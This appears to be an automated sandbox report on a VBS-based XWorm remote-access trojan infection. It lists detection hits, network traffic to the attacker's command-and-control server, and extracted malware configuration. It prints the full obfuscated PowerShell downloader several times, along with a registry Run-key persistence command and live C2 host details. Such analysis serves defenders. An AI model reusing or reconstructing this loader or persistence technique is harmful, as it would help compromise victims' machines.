HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)", ProcessId: 5096, ProcessName: cmd.exe
              Sigma detected: Suspicious Powershell In Registry Run Keys
              Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: %Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 4928, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\temp.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\temp.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\temp.vbs", ProcessId: 2620, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin';$Indgangssignaletnstruktionsbger+='g';Function Quadmeter($Dopingsigtet){$Dumpeprocenter=$Dopingsigtet.Length-$Autarkically189;For($Indgangssignalet=5;$Indgangssignalet -lt $Dumpeprocenter;$Indgangssignalet+=6){$Forlys+=$Dopingsigtet.$Indgangssignaletnstruktionsbger.Invoke( $Indgangssignalet, $Autarkically189);}$Forlys;}function Flaprer($Caissoned){& ($Sopites) ($Caissoned);}$Generalisternes=Quadmeter 'PylorM edto ,ildzI raeiMa oel Uerhl Falsahejka/Timia5 L ft.Gar,e0Andro K,rre(M.ckeW,evaaiSvinenAnti.dLandgo FluewSkalksgarnn OraclNJaponTYoudi Gr,ni1Codd 0Unde,.S ick0Tilkr;Event BistW joiniContrn .chw6 Hrin4S,vsu;Hapte Seg exRende6Gaine4Prebl;J.mps Pu prBoligv Fort: Edu.1 Hete2 cure1Vomme.Mona.0A.pel)Omber Vra.tG Trafe Her.cG,laxkMonisoHensl/Unsea2Foeta0Dekup1Wares0 udpl0Redes1Bepow0Muted1slapp .raktFPlaitiFuskerKentoe Ba,rf Tra,oUtrovxvedes/ Anda1Utilf2 Damp1 Trid.Bus,i0Ilixa ';$Lifeblood=Quadmeter 'FolkeUCroo s merceBestyrSulmu-KlimaAGul bgAnecdeSlut,nProtot luma ';$Postfrontal=Quadmeter 'Ca dihVaabetD llat.unktpSf.rbs Ndve:Hjlan/Broo / rickrCatkiacors,nOverlcT,enehPatruoT,ldebSupero Pol.sFrembcDickeaLecitr Sv.ndLatheiStyktnFilmo.Sweepcshaveo S pemCapit.PollybKulbrrSvend/Me.alcSk,ttsNasc /Hupa.RUnex rEnangk refonTas eo Jugeg HanelEva,geIgnitrP ntenF,rdreForst.A gotaKinetsAkkordBrug, ';$Uninnocuous=Quadmeter 'Kundg>Provi ';$Sopites=Quadmeter ',ablei RealePrespxTe,ef ';$Sorteringsmulighederne='Exclusion';$Opkaldsprisen = Quadmeter 'Se.areNoteacoprejhJovasoLeann Bem r%BiofeaD strp Stutp KviedDin oa Kurit Unscaman,e% Kono\OluffATraf k AareeUndernIsopyb ,kikocererlUnderdTindi.MissiuS,ilnd ,nntf Enta pos r&Plasm& Proc M,rateO erpcProtohUnmeeod zzi Hres.tHavmi ';Flaprer (Quadmeter ' Blus$Urgeng GerulFryseo Lempb FrdiaLs lulAn gg:Sta,sMBras,aScombrDoedsi JuleaYndlin acroe Udso=Drukk(Kolp,cWap,emTomatdTr.ll Unris/Ch ckc Exto Visib$Un erOmag,rpLinjekEntraaOverfl ,hardFulnes rtepCodesrRe rniBeloesTerraeXylopnBr.es)Sikke ');Flaprer (Quadmeter 'Beund$Ophiug BaptlFissio O dlbUdfaka.ordblWangl: EmbiSVetkotStnkso.rimeoPellenmediz= Rver$ MetoPProteo Parks EmantIoannfunsierC.nfioRo ernSkotjtBistiaKlimalOrico. Bisis nhidp Opbel frigi StiltScamb( tale$InsecUAlternKnapbiUltran urunnRefrao e accRd.hau InaloGoo,euSagitsArbut)Sickl ');$Postfrontal=$Stoon[0];$prespakket= (Quadmeter 'Blegs$ WoengBicyclNarkooNon.ubVagotaFald.lsingu:V.jrsH G gguMillicUnmedkExtrisArtictEcchae Bul.r Prece predrOuthu=LoneyNTo.sieOrthowPerfe-PigeoOAndalbSu.jejDrasteFrigrcOracutFntrr Bss.SProctyDeckhsWhimbtCetaneEmbramLe,be.AcapnNKubeueBr kvtPost . GeneWNondeeSu,nobHelheC H melplaniiKrisee Xylon rist');$prespakket+=$Mariane[1];Flaprer ($prespakket);Flaprer (Quadmeter ' vato$ ShelHPierlu emmecDuks kKbsprs G ostRaf ie ,erirSan.eeMe osrPtose. SlatH StriehundraForgadSpe.keTubulr SknhsSkift[Os.eo$KonceLForbliMi.spf DieseK
              Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin';$Indgangssignaletnstruktionsbger+='g';Function Quadmeter($Dopingsigtet){$Dumpeprocenter=$Dopingsigtet.Length-$Autarkically189;For($Indgangssignalet=5;$Indgangssignalet -lt $Dumpeprocenter;$Indgangssignalet+=6){$Forlys+=$Dopingsigtet.$Indgangssignaletnstruktionsbger.Invoke( $Indgangssignalet, $Autarkically189);}$Forlys;}function Flaprer($Caissoned){& ($Sopites) ($Caissoned);}$Generalisternes=Quadmeter 'PylorM edto ,ildzI raeiMa oel Uerhl Falsahejka/Timia5 L ft.Gar,e0Andro K,rre(M.ckeW,evaaiSvinenAnti.dLandgo FluewSkalksgarnn OraclNJaponTYoudi Gr,ni1Codd 0Unde,.S ick0Tilkr;Event BistW joiniContrn .chw6 Hrin4S,vsu;Hapte Seg exRende6Gaine4Prebl;J.mps Pu prBoligv Fort: Edu.1 Hete2 cure1Vomme.Mona.0A.pel)Omber Vra.tG Trafe Her.cG,laxkMonisoHensl/Unsea2Foeta0Dekup1Wares0 udpl0Redes1Bepow0Muted1slapp .raktFPlaitiFuskerKentoe Ba,rf Tra,oUtrovxvedes/ Anda1Utilf2 Damp1 Trid.Bus,i0Ilixa ';$Lifeblood=Quadmeter 'FolkeUCroo s merceBestyrSulmu-KlimaAGul bgAnecdeSlut,nProtot luma ';$Postfrontal=Quadmeter 'Ca dihVaabetD llat.unktpSf.rbs Ndve:Hjlan/Broo / rickrCatkiacors,nOverlcT,enehPatruoT,ldebSupero Pol.sFrembcDickeaLecitr Sv.ndLatheiStyktnFilmo.Sweepcshaveo S pemCapit.PollybKulbrrSvend/Me.alcSk,ttsNasc /Hupa.RUnex rEnangk refonTas eo Jugeg HanelEva,geIgnitrP ntenF,rdreForst.A gotaKinetsAkkordBrug, ';$Uninnocuous=Quadmeter 'Kundg>Provi ';$Sopites=Quadmeter ',ablei RealePrespxTe,ef ';$Sorteringsmulighederne='Exclusion';$Opkaldsprisen = Quadmeter 'Se.areNoteacoprejhJovasoLeann Bem r%BiofeaD strp Stutp KviedDin oa Kurit Unscaman,e% Kono\OluffATraf k AareeUndernIsopyb ,kikocererlUnderdTindi.MissiuS,ilnd ,nntf Enta pos r&Plasm& Proc M,rateO erpcProtohUnmeeod zzi Hres.tHavmi ';Flaprer (Quadmeter ' Blus$Urgeng GerulFryseo Lempb FrdiaLs lulAn gg:Sta,sMBras,aScombrDoedsi JuleaYndlin acroe Udso=Drukk(Kolp,cWap,emTomatdTr.ll Unris/Ch ckc Exto Visib$Un erOmag,rpLinjekEntraaOverfl ,hardFulnes rtepCodesrRe rniBeloesTerraeXylopnBr.es)Sikke ');Flaprer (Quadmeter 'Beund$Ophiug BaptlFissio O dlbUdfaka.ordblWangl: EmbiSVetkotStnkso.rimeoPellenmediz= Rver$ MetoPProteo Parks EmantIoannfunsierC.nfioRo ernSkotjtBistiaKlimalOrico. Bisis nhidp Opbel frigi StiltScamb( tale$InsecUAlternKnapbiUltran urunnRefrao e accRd.hau InaloGoo,euSagitsArbut)Sickl ');$Postfrontal=$Stoon[0];$prespakket= (Quadmeter 'Blegs$ WoengBicyclNarkooNon.ubVagotaFald.lsingu:V.jrsH G gguMillicUnmedkExtrisArtictEcchae Bul.r Prece predrOuthu=LoneyNTo.sieOrthowPerfe-PigeoOAndalbSu.jejDrasteFrigrcOracutFntrr Bss.SProctyDeckhsWhimbtCetaneEmbramLe,be.AcapnNKubeueBr kvtPost . GeneWNondeeSu,nobHelheC H melplaniiKrisee Xylon rist');$prespakket+=$Mariane[1];Flaprer ($prespakket);Flaprer (Quadmeter ' vato$ ShelHPierlu emmecDuks kKbsprs G ostRaf ie ,erirSan.eeMe osrPtose. SlatH StriehundraForgadSpe.keTubulr SknhsSkift[Os.eo$KonceLForbliMi.spf DieseK

              Snort Signatures

              Timestamp:05/22/24-20:08:54.410286
              SID:2853193
              Source Port:49708
              Destination Port:9402
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/22/24-20:08:48.122165
              SID:2852874
              Source Port:9402
              Destination Port:49708
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/22/24-20:07:51.668697
              SID:2855924
              Source Port:49708
              Destination Port:9402
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/22/24-20:08:48.122165
              SID:2852870
              Source Port:9402
              Destination Port:49708
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Found malware configuration
              Source: 00000013.00000002.2566248537.0000000023A41000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["xw9402may.duckdns.org"], "Port": "9402", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Source: unknownHTTPS traffic detected: 67.23.238.5:443 -> 192.168.2.7:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 67.23.238.5:443 -> 192.168.2.7:49707 version: TLS 1.2
              Source: Binary string: m.Core.pdb source: powershell.exe, 0000000E.00000002.1672574353.000000000707B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdby source: powershell.exe, 0000000E.00000002.1672574353.00000000070E2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1672574353.00000000070E2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 0000000E.00000002.1672574353.000000000707B000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 12.221.146.138:9402 -> 192.168.2.7:49708
              Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 12.221.146.138:9402 -> 192.168.2.7:49708
              Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.7:49708 -> 12.221.146.138:9402
              Source: TrafficSnort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.7:49708 -> 12.221.146.138:9402
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: xw9402may.duckdns.org
              Uses dynamic DNS services
              Source: unknownDNS query: name: xw9402may.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.7:49708 -> 12.221.146.138:9402
              Source: Joe Sandbox ViewIP Address: 12.221.146.138 12.221.146.138
              Source: Joe Sandbox ViewASN Name: ATT-INTERNET4US ATT-INTERNET4US
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /cs/Rrknoglerne.asd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ranchoboscardin.com.brConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /cs/yGxZBUGU144.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ranchoboscardin.com.brCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /cs/Rrknoglerne.asd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ranchoboscardin.com.brConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /cs/yGxZBUGU144.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ranchoboscardin.com.brCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: ranchoboscardin.com.br
              Source: global trafficDNS traffic detected: DNS query: xw9402may.duckdns.org
              Source: powershell.exe, 0000000A.00000002.1884830141.0000024B64330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1669259847.00000000055A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 0000000E.00000002.1664808097.0000000004698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 0000000A.00000002.1785583347.0000024B56067000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ranchoboscardin.com.br
              Source: powershell.exe, 0000000A.00000002.1785583347.0000024B542C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1664808097.0000000004541000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000013.00000002.2566248537.0000000023A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000E.00000002.1664808097.0000000004698000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1672574353.000000000707B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 0000000E.00000002.1672574353.00000000070E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.C
              Source: powershell.exe, 0000000A.00000002.1785583347.0000024B542C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000E.00000002.1664808097.0000000004541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 0000000E.00000002.1669259847.00000000055A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000000E.00000002.1669259847.00000000055A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000000E.00000002.1669259847.00000000055A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000000E.00000002.1664808097.0000000004698000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1672574353.000000000707B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 0000000A.00000002.1785583347.0000024B5550B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 0000000A.00000002.1884830141.0000024B64330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1669259847.00000000055A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 0000000A.00000002.1785583347.0000024B544E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1785583347.0000024B55B7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ranchoboscardin.com.br
              Source: wab.exe, 00000013.00000002.2542507637.0000000007A19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ranchoboscardin.com.br/
              Source: powershell.exe, 0000000A.00000002.1785583347.0000024B544E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ranchoboscardin.com.br/cs/Rrknoglerne.asdP
              Source: powershell.exe, 0000000E.00000002.1664808097.0000000004698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ranchoboscardin.com.br/cs/Rrknoglerne.asdXR
              Source: wab.exe, 00000013.00000002.2565537277.0000000023470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ranchoboscardin.com.br/cs/yGxZBU
              Source: wab.exe, 00000013.00000002.2542507637.0000000007A19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ranchoboscardin.com.br/cs/yGxZBUGU144.bin?
              Source: wab.exe, 00000013.00000002.2542507637.0000000007A19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ranchoboscardin.com.br/cs/yGxZBUGU144.binC
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownHTTPS traffic detected: 67.23.238.5:443 -> 192.168.2.7:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 67.23.238.5:443 -> 192.168.2.7:49707 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_4040.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 4788, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 4040, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Very long command line found
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6491
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6491
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6491Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6491Jump to behavior
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin';$Indgangssignaletnstruktionsbger+='g';Function Quadmeter($Dopingsigtet){$Dumpeprocenter=$Dopingsigtet.Length-$Autarkically189;For($Indgangssignalet=5;$Indgangssignalet -lt $Dumpeprocenter;$Indgangssignalet+=6){$Forlys+=$Dopingsigtet.$Indgangssignaletnstruktionsbger.Invoke( $Indgangssignalet, $Autarkically189);}$Forlys;}function Flaprer($Caissoned){& ($Sopites) ($Caissoned);}$Generalisternes=Quadmeter 'PylorM edto ,ildzI raeiMa oel Uerhl Falsahejka/Timia5 L ft.Gar,e0Andro K,rre(M.ckeW,evaaiSvinenAnti.dLandgo FluewSkalksgarnn OraclNJaponTYoudi Gr,ni1Codd 0Unde,.S ick0Tilkr;Event BistW joiniContrn .chw6 Hrin4S,vsu;Hapte Seg exRende6Gaine4Prebl;J.mps Pu prBoligv Fort: Edu.1 Hete2 cure1Vomme.Mona.0A.pel)Omber Vra.tG Trafe Her.cG,laxkMonisoHensl/Unsea2Foeta0Dekup1Wares0 udpl0Redes1Bepow0Muted1slapp .raktFPlaitiFuskerKentoe Ba,rf Tra,oUtrovxvedes/ Anda1Utilf2 Damp1 Trid.Bus,i0Ilixa ';$Lifeblood=Quadmeter 'FolkeUCroo s merceBestyrSulmu-KlimaAGul bgAnecdeSlut,nProtot luma ';$Postfrontal=Quadmeter 'Ca dihVaabetD llat.unktpSf.rbs Ndve:Hjlan/Broo / rickrCatkiacors,nOverlcT,enehPatruoT,ldebSupero Pol.sFrembcDickeaLecitr Sv.ndLatheiStyktnFilmo.Sweepcshaveo S pemCapit.PollybKulbrrSvend/Me.alcSk,ttsNasc /Hupa.RUnex rEnangk refonTas eo Jugeg HanelEva,geIgnitrP ntenF,rdreForst.A gotaKinetsAkkordBrug, ';$Uninnocuous=Quadmeter 'Kundg>Provi ';$Sopites=Quadmeter ',ablei RealePrespxTe,ef ';$Sorteringsmulighederne='Exclusion';$Opkaldsprisen = Quadmeter 'Se.areNoteacoprejhJovasoLeann Bem r%BiofeaD strp Stutp KviedDin oa Kurit Unscaman,e% Kono\OluffATraf k AareeUndernIsopyb ,kikocererlUnderdTindi.MissiuS,ilnd ,nntf Enta pos r&Plasm& Proc M,rateO erpcProtohUnmeeod zzi Hres.tHavmi ';Flaprer (Quadmeter ' Blus$Urgeng GerulFryseo Lempb FrdiaLs lulAn gg:Sta,sMBras,aScombrDoedsi JuleaYndlin acroe Udso=Drukk(Kolp,cWap,emTomatdTr.ll Unris/Ch ckc Exto Visib$Un erOmag,rpLinjekEntraaOverfl ,hardFulnes rtepCodesrRe rniBeloesTerraeXylopnBr.es)Sikke ');Flaprer (Quadmeter 'Beund$Ophiug BaptlFissio O dlbUdfaka.ordblWangl: EmbiSVetkotStnkso.rimeoPellenmediz= Rver$ MetoPProteo Parks EmantIoannfunsierC.nfioRo ernSkotjtBistiaKlimalOrico. Bisis nhidp Opbel frigi StiltScamb( tale$InsecUAlternKnapbiUltran urunnRefrao e accRd.hau InaloGoo,euSagitsArbut)Sickl ');$Postfrontal=$Stoon[0];$prespakket= (Quadmeter 'Blegs$ WoengBicyclNarkooNon.ubVagotaFald.lsingu:V.jrsH G gguMillicUnmedkExtrisArtictEcchae Bul.r Prece predrOuthu=LoneyNTo.sieOrthowPerfe-PigeoOAndalbSu.jejDrasteFrigrcOracutFntrr Bss.SProctyDeckhsWhimbtCetaneEmbramLe,be.AcapnNKubeueBr kvtPost . GeneWNondeeSu,nobHelheC H melplaniiKrisee Xylon rist');$prespakket+=$Mariane[1];Flaprer ($prespakket);Flaprer (Quadmeter ' vato$ ShelHPierlu emmecDuks kKbsprs G ostRaf ie ,erirSan.eeMe osrPtose. SlatH StriehundraForgadSp
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin';$Indgangssignaletnstruktionsbger+='g';Function Quadmeter($Dopingsigtet){$Dumpeprocenter=$Dopingsigtet.Length-$Autarkically189;For($Indgangssignalet=5;$Indgangssignalet -lt $Dumpeprocenter;$Indgangssignalet+=6){$Forlys+=$Dopingsigtet.$Indgangssignaletnstruktionsbger.Invoke( $Indgangssignalet, $Autarkically189);}$Forlys;}function Flaprer($Caissoned){& ($Sopites) ($Caissoned);}$Generalisternes=Quadmeter 'PylorM edto ,ildzI raeiMa oel Uerhl Falsahejka/Timia5 L ft.Gar,e0Andro K,rre(M.ckeW,evaaiSvinenAnti.dLandgo FluewSkalksgarnn OraclNJaponTYoudi Gr,ni1Codd 0Unde,.S ick0Tilkr;Event BistW joiniContrn .chw6 Hrin4S,vsu;Hapte Seg exRende6Gaine4Prebl;J.mps Pu prBoligv Fort: Edu.1 Hete2 cure1Vomme.Mona.0A.pel)Omber Vra.tG Trafe Her.cG,laxkMonisoHensl/Unsea2Foeta0Dekup1Wares0 udpl0Redes1Bepow0Muted1slapp .raktFPlaitiFuskerKentoe Ba,rf Tra,oUtrovxvedes/ Anda1Utilf2 Damp1 Trid.Bus,i0Ilixa ';$Lifeblood=Quadmeter 'FolkeUCroo s merceBestyrSulmu-KlimaAGul bgAnecdeSlut,nProtot luma ';$Postfrontal=Quadmeter 'Ca dihVaabetD llat.unktpSf.rbs Ndve:Hjlan/Broo / rickrCatkiacors,nOverlcT,enehPatruoT,ldebSupero Pol.sFrembcDickeaLecitr Sv.ndLatheiStyktnFilmo.Sweepcshaveo S pemCapit.PollybKulbrrSvend/Me.alcSk,ttsNasc /Hupa.RUnex rEnangk refonTas eo Jugeg HanelEva,geIgnitrP ntenF,rdreForst.A gotaKinetsAkkordBrug, ';$Uninnocuous=Quadmeter 'Kundg>Provi ';$Sopites=Quadmeter ',ablei RealePrespxTe,ef ';$Sorteringsmulighederne='Exclusion';$Opkaldsprisen = Quadmeter 'Se.areNoteacoprejhJovasoLeann Bem r%BiofeaD strp Stutp KviedDin oa Kurit Unscaman,e% Kono\OluffATraf k AareeUndernIsopyb ,kikocererlUnderdTindi.MissiuS,ilnd ,nntf Enta pos r&Plasm& Proc M,rateO erpcProtohUnmeeod zzi Hres.tHavmi ';Flaprer (Quadmeter ' Blus$Urgeng GerulFryseo Lempb FrdiaLs lulAn gg:Sta,sMBras,aScombrDoedsi JuleaYndlin acroe Udso=Drukk(Kolp,cWap,emTomatdTr.ll Unris/Ch ckc Exto Visib$Un erOmag,rpLinjekEntraaOverfl ,hardFulnes rtepCodesrRe rniBeloesTerraeXylopnBr.es)Sikke ');Flaprer (Quadmeter 'Beund$Ophiug BaptlFissio O dlbUdfaka.ordblWangl: EmbiSVetkotStnkso.rimeoPellenmediz= Rver$ MetoPProteo Parks EmantIoannfunsierC.nfioRo ernSkotjtBistiaKlimalOrico. Bisis nhidp Opbel frigi StiltScamb( tale$InsecUAlternKnapbiUltran urunnRefrao e accRd.hau InaloGoo,euSagitsArbut)Sickl ');$Postfrontal=$Stoon[0];$prespakket= (Quadmeter 'Blegs$ WoengBicyclNarkooNon.ubVagotaFald.lsingu:V.jrsH G gguMillicUnmedkExtrisArtictEcchae Bul.r Prece predrOuthu=LoneyNTo.sieOrthowPerfe-PigeoOAndalbSu.jejDrasteFrigrcOracutFntrr Bss.SProctyDeckhsWhimbtCetaneEmbramLe,be.AcapnNKubeueBr kvtPost . GeneWNondeeSu,nobHelheC H melplaniiKrisee Xylon rist');$prespakket+=$Mariane[1];Flaprer ($prespakket);Flaprer (Quadmeter ' vato$ ShelHPierlu emmecDuks kKbsprs G ostRaf ie ,erirSan.eeMe osrPtose. SlatH StriehundraForgadSpJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess Stats: CPU usage > 49%
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFAAC50B8D210_2_00007FFAAC50B8D2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFAAC50AB2610_2_00007FFAAC50AB26
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_02D6E92814_2_02D6E928
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_02D6F1F814_2_02D6F1F8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_02D6E5E014_2_02D6E5E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_02FDD8E819_2_02FDD8E8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_02FDEB9819_2_02FDEB98
              Source: temp.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)"
